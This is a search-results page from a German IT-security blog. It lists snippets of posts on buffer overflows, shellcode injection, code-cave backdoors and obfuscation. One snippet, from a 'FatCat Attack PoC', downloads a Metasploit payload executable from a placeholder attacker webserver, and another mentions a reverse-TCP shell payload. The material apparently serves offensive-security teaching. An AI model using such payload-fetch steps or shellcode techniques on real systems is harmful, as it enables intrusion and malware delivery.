NoSociety.de

#nosoc

  • Seiten-Werkzeuge
    Seite anzeigenÄltere VersionenLinks hierher
  • Webseiten-Werkzeuge
    Letzte ÄnderungenMedien-ManagerÜbersicht
  • Benutzer-Werkzeuge
    Anmelden

Suche

Unten sind die Ergebnisse Ihrer Suche gelistet.

Enthält
  • Genaue Treffer
  • Beginnt mit
  • Endet mit
  • Enthält
@it-security
  • Alle Namensräume
  • it-security:blog (9)
Jederzeit
  • Jederzeit
  • Letzte Woche
  • Letzter Monat
  • letztes Jahr
Sortiere nach Treffer
  • Sortiere nach Treffer
  • Sortiere nach letzter Änderung

Volltextergebnisse:

Buffer Overflow im 64-Bit Stack - Teil 3 @it-security:blog
14 Treffer, Zuletzt geändert: vor 4 Monaten
/nosoc-bof/tree/main/part-3|Github]] verfügbar. <file c bof-part3.c> /* Code https://blog.techorganic.c... setbuf(stdout, 0); vuln(); return 0; } </file> \\ \\ ===== Debug ===== {{page>vorlagen:attent... s ein erstes Exploit, um ''write()'' zu leaken. <file python buf3-stage1.py> #!/usr/bin/env python fro... # POP Argumente buf += p64(constants.STDOUT_FILENO) # stdout buf += p64(bin.got[b'write'])
Backdoor development with Code Caves @it-security:blog
6 Treffer, Zuletzt geändert: vor 5 Monaten
Address: 0x8000660f [*] File Ofset: 0xd4855 </code> ==== 2.2 Prepare the cave... - Set section flags to RWX and Code - Save the file {{it-security:blog:bd-putty-3.png?800}} ===== 3... ge every time, I debug the raw shellcode from the file ''%%modules/payloads/singles/windows/x64/shell_re... '' and modify the affected bytes. I then save the file as ''%%custom_shell_reverse_tcp%%'' in the same d
Shellcode Injection Teil 1 @it-security:blog
4 Treffer, Zuletzt geändert: vor 10 Monaten
. Diese entnehmen wir der ''msfvenom'' Ausgabe. <file cpp local-process-injection.cpp> #include <stdio.... ad, size); ((void(*)())code)(); return(0); } </file> \\ \\ ==== Shellcode analysieren ==== Nach dem ... calc_payload[position] = jigsaw[idx]; } </code> <file c++ Inject.cpp> #include <stdio.h> #include <Wind... size); ((void(*)())code)(); return(0); } </file> Jigsaw allein reicht an dieser Stelle jedoch ni
Hilfreiche NMAP Scanner Kommandos
3 Treffer, Zuletzt geändert: vor 11 Monaten
aceroute -O: Enable OS detection -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, ... and Grepable format, respectively, to the given filename. -iL <inputfilename>: Input from list of hosts/networks </code> <code bash> #Portrange nmap -v -sS
IT Security Cheat Sheets
1 Treffer, Zuletzt geändert: vor 15 Monaten
tps://gist.github.com/Stolas/c67b0d6ce1de78869764#file-gdb-cheatsheet-L65|Github]] | ^ ::: | Metasploit
Host Discovery mit Metasploit Datenbank
1 Treffer, Zuletzt geändert: vor 10 Monaten
bases 'msf' and 'msf_test' Creating configuration file in /usr/share/metasploit-framework/config/databas
Buffer Overflow im 64-Bit Stack - Teil 1 @it-security:blog
1 Treffer, Zuletzt geändert: vor 11 Monaten
Der Shellcode((http://shell-storm.org/shellcode/files/shellcode-77.html)) wird in einer Umgebungsvaria
Buffer Overflow im 64-Bit Stack - Teil 2 @it-security:blog
1 Treffer, Zuletzt geändert: vor 11 Monaten
en uns die Gadgets anzeigen <code bash> ropper --file bof-part2 ... 0x000000000040116a: pop rdi; ret; .
FatCat Attack PoC @it-security:blog
1 Treffer, Zuletzt geändert: vor 15 Monaten
ttps://<DEIN-COOLER-WEBSERVER>/msfpayload.exe -OutFile msfpayload.exe DELAY 3000 ENTER DELAY 5000 STRING
Obfuscation: polymorpher In-Memory Decoder @it-security:blog
1 Treffer, Zuletzt geändert: vor 9 Monaten
xor-decoder.stub -fb 60 -lb 329 [*] try to open file [+] reading xor-decoder.o successful! [*] cutting
Obfuscation: Shellcode als UUIDs tarnen @it-security:blog
1 Treffer, Zuletzt geändert: vor 10 Monaten
nun in etwas so aus: <code cpp> [*] try to open file [+] reading 240906.001 successful! [*] try to gen
Shellcode Injection Teil 3 @it-security:blog
1 Treffer, Zuletzt geändert: vor 12 Monaten
jdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' '